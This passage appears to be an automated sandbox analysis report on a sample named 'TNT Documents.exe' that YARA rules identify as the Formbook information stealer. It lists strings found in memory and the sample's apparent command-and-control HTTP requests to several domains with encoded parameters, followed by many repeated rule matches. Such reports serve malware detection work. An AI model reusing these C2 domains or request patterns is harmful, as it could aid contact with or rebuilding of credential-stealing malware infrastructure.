          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.comp
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/slnt
          Source: TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/soft
          Source: TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
          Source: TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comus4
          Source: TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comU
          Source: TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.der
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn9
          Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: unknownDNS traffic detected: queries for: www.cortepuroiberico.com
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: TNT Documents.exe
          .NET source code contains very large stringsShow sources
          Source: TNT Documents.exe, Form1.csLong String: Length: 22528
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.csLong String: Length: 22528
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.csLong String: Length: 22528
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.csLong String: Length: 22528
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.csLong String: Length: 22528
          Source: TNT Documents.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
